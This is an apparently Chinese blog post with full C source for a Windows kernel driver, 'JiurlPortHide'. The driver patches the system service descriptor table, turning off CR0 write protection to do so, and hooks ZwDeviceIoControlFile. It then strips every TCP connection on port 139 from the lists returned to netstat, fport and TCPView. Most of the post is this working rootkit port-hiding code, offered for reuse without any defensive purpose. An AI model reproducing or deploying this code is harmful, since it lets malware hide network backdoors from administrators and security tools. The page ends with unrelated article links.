Hook 系統服務隱藏端口

原創 pll621 2020-02-21 10:23
有時候寫程序,調試程序真是一件非常有趣的事,就比如這次,蹦蹦跳跳,笑嘻嘻,意猶未盡的就把這個程序搞好了。

netstat 或者其他各種列舉端口的工具,比如fport,或者 sysinternals 的 Tcpview,都是調用 Iphlpapi.dll 中的 API 來完成端口的列舉。而 Iphlpapi.dll 中的 API 最終是使用 ZwDeviceIoControlFile ,向設備對象 Device/Tcp 發 IOCTL_TCP_QUERY_INFORMATION_EX 來得到各種信息的。於是我們只要Hook相應的System Service ,然後對得到的結果做一些處理,弄掉不希望出現的端口信息就可以了。不過真正的問題在於,IOCTL_TCP_QUERY_INFORMATION_EX 和端口相關的各種結構定義,參數含義目前都(大部分)是未公開,沒人知道的,也就是Undocumented的。Undocumented?? ring3調試,我熟啊。ring0調試,我熟啊。Windows驅動,我熟啊。Windows系統,我熟啊。我怕誰啊我。Undocumented??爽,要的就是Undocumented。

通過ring3調試,分析Iphlpapi.dll是如何使用 IOCTL_TCP_QUERY_INFORMATION_EX 相關的各種參數,結合msdn中的一些信息,於是很輕鬆的搞清了需要了解的結構。用我自己寫的awx建一個VC的驅動項目,寫好了Hook部分。

關於本例中使用的解決Hook在各種Windows版本下運行的方法,在很多地方很多地方都出現了,我不清楚最早是誰想出來的,我是在《Undocumented Windows NT》一書的源碼中第一次看到這種方法的。

下面是實現源碼,很簡單,我就不多說什麼了。

#if 0 //================================================================
Copyright (c) JIURL, All Rights Reserved
========================================================================

/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/

Module Name:

Jiurl_tcpioctl.h

About:

- 這個驅動項目由一個我寫的 AppWizard 創建。

[ HomePage ] http://jiurl.yeah.net
~~~~~~~~~~~~~~~~~~~~~
[ Email ] [email protected]
~~~~~~~~~~~~~~~~~~~~
[ Forum ] http://jiurl.cosoft.org.cn/forum/index.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

- 有償定製 AppWizard ,請發郵件聯繫 。

Comments:

本文件中的所有內容目前都是未公開的,由我分析得出,是隱藏端口的關鍵內容。
Undocumented?? 爽!要的就是 Undocumented 。

/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/
#endif

// jiurl // IPSNMPInfo 結構的定義是根據 RFC 2011
// jiurl // 所以我根據 RFC 2022 ,仿 IPSNMPInfo, 定義結構 TCPSNMPInfo
// jiurl // 再通過一些分析得到一些擴展部分的定義

typedef struct TCPSNMPInfo {
ULONG tcpsi_RtoAlgorithm;
ULONG tcpsi_RtoMin;
ULONG tcpsi_RtoMax;
ULONG tcpsi_MaxConn;
ULONG tcpsi_ActiveOpens;
ULONG tcpsi_PassiveOpens;
ULONG tcpsi_AttemptFails;
ULONG tcpsi_EstabResets;
ULONG tcpsi_CurrEstab;
ULONG tcpsi_InSegs;
ULONG tcpsi_OutSegs;
ULONG tcpsi_RetransSegs;
ULONG tcpsi_unknown1;
ULONG tcpsi_unknown2;
ULONG tcpsi_numconn;
} TCPSNMPInfo;

#define tcpRtoAlgorithm_other 1 // none of the following
#define tcpRtoAlgorithm_constant 2 // a constant rto
#define tcpRtoAlgorithm_rsre 3 // MIL-STD-1778, Appendix B
#define tcpRtoAlgorithm_vanj 4 // Van Jacobson's algorithm

#define TCP_MIB_STATS_ID 1
#define TCP_MIB_ADDRTABLE_ENTRY_ID 0x101
#define TCP_MIB_ADDRTABLE_ENTRY_EX_ID 0x102

typedef struct TCPAddrEntry {
ULONG tae_ConnState;
ULONG tae_ConnLocalAddress;
ULONG tae_ConnLocalPort;
ULONG tae_ConnRemAddress;
ULONG tae_ConnRemPort;
} TCPAddrEntry;

#define tcpConnState_closed 1
#define tcpConnState_listen 2
#define tcpConnState_synSent 3
#define tcpConnState_synReceived 4
#define tcpConnState_established 5
#define tcpConnState_finWait1 6
#define tcpConnState_finWait2 7
#define tcpConnState_closeWait 8
#define tcpConnState_lastAck 9
#define tcpConnState_closing 10
#define tcpConnState_timeWait 11
#define tcpConnState_deleteTCB 12

typedef struct TCPAddrExEntry {
ULONG tae_ConnState;
ULONG tae_ConnLocalAddress;
ULONG tae_ConnLocalPort;
ULONG tae_ConnRemAddress;
ULONG tae_ConnRemPort;
ULONG pid;
} TCPAddrExEntry;

#if 0 //================================================================
Copyright (c) JIURL, All Rights Reserved
========================================================================

/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/

Module Name:

JiurlPortHide.h

About:

- 這個驅動項目由一個我寫的 AppWizard 創建。

[ HomePage ] http://jiurl.yeah.net
~~~~~~~~~~~~~~~~~~~~~
[ Email ] [email protected]
~~~~~~~~~~~~~~~~~~~~
[ Forum ] http://jiurl.cosoft.org.cn/forum/index.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

- 有償定製 AppWizard ,請發郵件聯繫 。

/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/
#endif

#define PORTHIDE 139

#pragma pack(1)
typedef struct ServiceDescriptorEntry {
unsigned int *ServiceTableBase;
unsigned int *ServiceCounterTableBase; //Used only in checked build
unsigned int NumberOfServices;
unsigned char *ParamTableBase;
} ServiceDescriptorTableEntry_t, *PServiceDescriptorTableEntry_t;
#pragma pack()

__declspec(dllimport) ServiceDescriptorTableEntry_t KeServiceDescriptorTable;

NTSYSAPI
NTSTATUS
NTAPI
ZwDeviceIoControlFile(
IN HANDLE FileHandle,
IN HANDLE Event OPTIONAL,
IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
IN PVOID ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN ULONG IoControlCode,
IN PVOID InputBuffer OPTIONAL,
IN ULONG InputBufferLength,
OUT PVOID OutputBuffer OPTIONAL,
IN ULONG OutputBufferLength
);

typedef NTSTATUS (*ZWDEVICEIOCONTROLFILE)(
IN HANDLE FileHandle,
IN HANDLE Event OPTIONAL,
IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
IN PVOID ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN ULONG IoControlCode,
IN PVOID InputBuffer OPTIONAL,
IN ULONG InputBufferLength,
OUT PVOID OutputBuffer OPTIONAL,
IN ULONG OutputBufferLength
);

ZWDEVICEIOCONTROLFILE OldZwDeviceIoControlFile;

void DriverUnload(IN PDRIVER_OBJECT DriverObject);

NTSTATUS
DriverDispatch(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp);

NTSTATUS NewZwDeviceIoControlFile(
IN HANDLE FileHandle,
IN HANDLE Event OPTIONAL,
IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
IN PVOID ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN ULONG IoControlCode,
IN PVOID InputBuffer OPTIONAL,
IN ULONG InputBufferLength,
OUT PVOID OutputBuffer OPTIONAL,
IN ULONG OutputBufferLength
);

// jiurl // from addrconv.cpp
#define ntohs(s) /
( ( ((s) >> 8) & 0x00FF ) | /
( ((s) << 8) & 0xFF00 ) )

// jiurl // from tcpioctl.h tdiinfo.h tdistat.h
#define IOCTL_TCP_QUERY_INFORMATION_EX 0x00120003

//* Structure of an entity ID.
typedef struct TDIEntityID {
ULONG tei_entity;
ULONG tei_instance;
} TDIEntityID;

//* Structure of an object ID.
typedef struct TDIObjectID {
TDIEntityID toi_entity;
ULONG toi_class;
ULONG toi_type;
ULONG toi_id;
} TDIObjectID;

#define CONTEXT_SIZE 16
//
// QueryInformationEx IOCTL. The return buffer is passed as the OutputBuffer
// in the DeviceIoControl request. This structure is passed as the
// InputBuffer.
//
struct tcp_request_query_information_ex {
TDIObjectID ID; // object ID to query.
ULONG_PTR Context[CONTEXT_SIZE/sizeof(ULONG_PTR)]; // multi-request context. Zeroed
// for the first request.
};

typedef struct tcp_request_query_information_ex
TCP_REQUEST_QUERY_INFORMATION_EX,
*PTCP_REQUEST_QUERY_INFORMATION_EX;

#define CO_TL_ENTITY 0x400
#define INFO_CLASS_PROTOCOL 0x200
#define INFO_TYPE_PROVIDER 0x100

#if 0 //================================================================
Copyright (c) JIURL, All Rights Reserved
========================================================================

/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/

Module Name:

JiurlPortHide.cpp

About:

- 這個驅動項目由一個我寫的 AppWizard 創建。

[ HomePage ] http://jiurl.yeah.net
~~~~~~~~~~~~~~~~~~~~~
[ Email ] [email protected]
~~~~~~~~~~~~~~~~~~~~
[ Forum ] http://jiurl.cosoft.org.cn/forum/index.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

- 有償定製 AppWizard ,請發郵件聯繫 。

/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/
#endif

#ifdef __cplusplus
extern "C"
{
#endif

#include <ntddk.h>

#include "JiurlPortHide.h"
#include "Jiurl_tcpioctl.h"

#ifdef __cplusplus
}
#endif

NTSTATUS
DriverEntry(IN PDRIVER_OBJECT DriverObject,
IN PUNICODE_STRING RegistryPath)
{
DbgPrint("JiurlPortHide: Hello,This is DriverEntry!/n");

DriverObject->MajorFunction[IRP_MJ_CREATE] =
DriverObject->MajorFunction[IRP_MJ_CLOSE] = DriverDispatch;
DriverObject->DriverUnload = DriverUnload;

// save old system call locations
OldZwDeviceIoControlFile = (ZWDEVICEIOCONTROLFILE)(KeServiceDescriptorTable.ServiceTableBase[ *(PULONG)((PUCHAR)ZwDeviceIoControlFile+1)]);

_asm
{
CLI //dissable interrupt
MOV EAX, CR0 //move CR0 register into EAX
AND EAX, NOT 10000H //disable WP bit
MOV CR0, EAX //write register back
}

(KeServiceDescriptorTable.ServiceTableBase[ *(PULONG)((PUCHAR)ZwDeviceIoControlFile+1)]) = (ULONG)NewZwDeviceIoControlFile;

_asm
{
MOV EAX, CR0 //move CR0 register into EAX
OR EAX, 10000H //enable WP bit
MOV CR0, EAX //write register back
STI //enable interrupt
}

return STATUS_SUCCESS;
}

NTSTATUS
DriverDispatch(
IN PDEVICE_OBJECT DeviceObject,
IN PIRP Irp
)
{
Irp->IoStatus.Status = STATUS_SUCCESS;
IoCompleteRequest (Irp,IO_NO_INCREMENT);
return Irp->IoStatus.Status;
}

void DriverUnload(IN PDRIVER_OBJECT DriverObject)
{
DbgPrint("JiurlPortHide: Bye,This is DriverUnload!/n");

_asm
{
CLI //dissable interrupt
MOV EAX, CR0 //move CR0 register into EAX
AND EAX, NOT 10000H //disable WP bit
MOV CR0, EAX //write register back
}

(KeServiceDescriptorTable.ServiceTableBase[ *(PULONG)((PUCHAR)ZwDeviceIoControlFile+1)]) = (ULONG)OldZwDeviceIoControlFile;

_asm
{
MOV EAX, CR0 //move CR0 register into EAX
OR EAX, 10000H //enable WP bit
MOV CR0, EAX //write register back
STI //enable interrupt
}
}

NTSTATUS NewZwDeviceIoControlFile(
IN HANDLE FileHandle,
IN HANDLE Event OPTIONAL,
IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
IN PVOID ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN ULONG IoControlCode,
IN PVOID InputBuffer OPTIONAL,
IN ULONG InputBufferLength,
OUT PVOID OutputBuffer OPTIONAL,
IN ULONG OutputBufferLength
)
{
NTSTATUS rc;

rc = ((ZWDEVICEIOCONTROLFILE)(OldZwDeviceIoControlFile)) (
FileHandle,
Event,
ApcRoutine,
ApcContext,
IoStatusBlock,
IoControlCode,
InputBuffer,
InputBufferLength,
OutputBuffer,
OutputBufferLength
);

if(IoControlCode != IOCTL_TCP_QUERY_INFORMATION_EX)
{
return(rc);
}

TCP_REQUEST_QUERY_INFORMATION_EX req;
TCPAddrEntry* TcpTable;
TCPAddrExEntry* TcpExTable;
ULONG numconn;
LONG i;

DbgPrint("JiurlPortHide: IOCTL_TCP_QUERY_INFORMATION_EX/n");

if( NT_SUCCESS( rc ) )
{
req.ID.toi_entity.tei_entity = CO_TL_ENTITY;
req.ID.toi_entity.tei_instance = 0;
req.ID.toi_class = INFO_CLASS_PROTOCOL;
req.ID.toi_type = INFO_TYPE_PROVIDER;
req.ID.toi_id = TCP_MIB_ADDRTABLE_ENTRY_ID;

if( !memcmp( InputBuffer, &req, sizeof(TDIObjectID) ) )
{
numconn = IoStatusBlock->Information/sizeof(TCPAddrEntry);
TcpTable = (TCPAddrEntry*)OutputBuffer;

for( i=0; i<numconn; i++ )
{
if( ntohs(TcpTable[i].tae_ConnLocalPort) == PORTHIDE )
{
DbgPrint("JiurlPortHide: HidePort %d/n", ntohs(TcpTable[i].tae_ConnLocalPort));

memcpy( (TcpTable+i), (TcpTable+i+1), ((numconn-i-1)*sizeof(TCPAddrEntry)) );
numconn--;
i--;
}
}

IoStatusBlock->Information = numconn*sizeof(TCPAddrEntry);
return(rc);
}

req.ID.toi_id = TCP_MIB_ADDRTABLE_ENTRY_EX_ID;

if( !memcmp( InputBuffer, &req, sizeof(TDIObjectID) ) )
{
numconn = IoStatusBlock->Information/sizeof(TCPAddrExEntry);
TcpExTable = (TCPAddrExEntry*)OutputBuffer;

for( i=0; i<numconn; i++ )
{
if( ntohs(TcpExTable[i].tae_ConnLocalPort) == PORTHIDE )
{
DbgPrint("JiurlPortHide: HidePort %d/n",ntohs(TcpTable[i].tae_ConnLocalPort));

memcpy( (TcpExTable+i), (TcpExTable+i+1), ((numconn-i-1)*sizeof(TCPAddrExEntry)) );
numconn--;
i--;
}
}

IoStatusBlock->Information = numconn*sizeof(TCPAddrExEntry);
return(rc);
}
}

return(rc);
}

站內首發文章
pll621
發佈了87 篇原創文章 · 獲贊 2 · 訪問量 18萬+
私信 關注
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

不愛看視頻的有福了:AppBuilder工作流編排功能實操講解

千帆AppBuilder的工作流編排功能上線後,爲了讓用戶能夠更快地熟悉操作,我們請到了AppBuilder的產品經理爲大家直播講解。 在這次直播中,PM小姐姐深入介紹並演示了工作流編排功能,通過創建多個組件,生動展示了AppBui

原創 2024-05-16 00:15:52

k12教育常規賽倒計時3天!快來爲你心中的優秀應用打call~

⏰倒計時3天!K12教育常規賽倒計時開啓~ 最後的衝刺來啦!K12教育常規賽:賽題爲開放賽題,參賽者需聚焦小學、初中、高中生的學習或生活場景,使用百度智能雲千帆AppBuilder創作AI原生應用,形式、創意不限,0代碼低門檻創建應用,常

原創 2024-04-17 23:29:39

RAG應用開發實戰02-相似性檢索的關鍵 - Embedding

1 文本Embedding 將整個文本轉化爲實數向量的技術。 Embedding優點是可將離散的詞語或句子轉化爲連續的向量,就可用數學方法來處理詞語或句子,捕捉到文本的語義信息,文本和文本的關係信息。 ◉ 優質的Embedding通常會讓語

原創 2024-04-15 01:07:41

mysqldump 備份產生大量慢查詢,有辦法過濾麼?

MySQL 8.0.30 新功能,再也不用擔心大量無效日誌了! 作者:李富強,愛可生 DBA 團隊成員,熟悉 MySQL,TiDB,OceanBase 等數據庫。相信持續把對的事情做好一點,會有不一樣的收穫。 愛可生開源社區出品,原創內容

原創 2024-04-08 23:20:09

數倉調優實戰:GUC參數調優

本文分享自華爲雲社區《GaussDB(DWS)性能調優系列實戰篇七:十八般武藝之GUC參數調優》,作者: 黎明的風。 1. 前言 適用版本:【8.1.1及以上】 GaussDB(DWS)性能調優系列專題文章,介紹了數據庫性能調優的思路

原創 2024-04-07 22:32:37

elasticsearch 監控查看活躍的search

GET _nodes/stats indexing 顯示已經索引了多少文檔。這個值是一個累加計數器。在文檔被刪除的時候,數值不會下降。還要注意的是,在發生內部 索引 操作的時候,這個值也會增加,比如說文檔更新。 還列出了索引操作耗費

原創 2024-04-07 13:07:02

AI原生應用元年:不是大模型捲不起,而是“應用”更具性價比

導讀                                                                                              

百度開發者中心 2024-04-07 11:28:15

100+創意AI原生應用,總有一款你感興趣的

“千帆杯AI原生應用開發挑戰賽”自開賽以來,得到上千名開發者的熱情參與,已成功舉辦2期,創作了幾百個具有實踐意義的創新AI原生應用。在此期間得到了衆多開發者的寶貴建議,爲進一步激活開發者創作熱情,提升開發者創新體驗,“千帆杯AI原生應用

百度開發者中心 2024-04-07 11:28:12

手動給docusaurus添加一個搜索

新版博客用docusaurus重構已經有些日子了,根據docusaurus的文檔上也申請了Algolia,想一勞永逸的解決博客的搜索問題。但是流水有意,落花無情。 algolia總是不給我回復,我只能對着algolia的申請頁面仰天長嘆。

原創 2024-04-19 21:30:54

前端面試題 - vue的雙向綁定原理是什麼?

前端面試題 - vue的雙向綁定原理是什麼? vue2的雙向數據綁定是通過數據劫持結合發佈者訂閱者模式的方式來實現。 通過object.defineProperty來劫持各個屬性的setter,getter,在數據變化時發佈消息給訂閱者,

原創 2024-05-17 00:41:12

【解決】element表單動態添加或更新表單項,回顯後無法修改或提示爲空的問題

原方法  /** * 動態更新form * @param form */ updateForm(form) { this.form.manholeId = form.manholeId; this.form

原創 2024-05-15 12:08:40

前端面試題 - null是原始類型,但爲什麼typeof null的結果是object?

前端面試題 - null是原始類型,但爲什麼typeof null的結果是object? 造成這個結果的原因是null的內存地址是以000開頭,而js會將000開頭的內存地址視爲object。 通過isNull()來判斷一個值是不是null

原創 2024-05-01 23:50:23

前端面試題 - 賦值/淺拷貝/深拷貝的區別?如何實現一個深拷貝?

前端面試題 - 賦值/淺拷貝/深拷貝的區別?如何實現一個深拷貝? 賦值是拷貝的對象指針,整個對象都是共用的。 淺拷貝是拷貝一層,對象的內容仍是共用的,Object.assign(),拓展運算符都是淺拷貝。 深拷貝是遞歸拷貝深層次,JSON

原創 2024-04-24 23:51:01

vue3 清空reactive的多種方式 精選 原創

在 Vue3 中,可以使用 reactive 函數創建響應式對象。這些響應式對象可以跟蹤其屬性的變化並且自動地更新視圖。但是在某些情況下,我們可能需要清空這些響應式對象。下面是一些方法來清空 Vue3 reactive。 方法一:使用 Ob

文文1 2024-04-12 00:51:32

Java中final、finally、finalize 的區別

final: 用於聲明屬性,方法和類,分別表示屬性不可變,方法不可覆蓋,被其修飾的類不可繼承。 finally: 異常處理語句結構的一部分,表示總是執行。 finalize: Object 類的一個方法,在垃圾回收器執行的時候會

原創 2024-04-07 23:33:49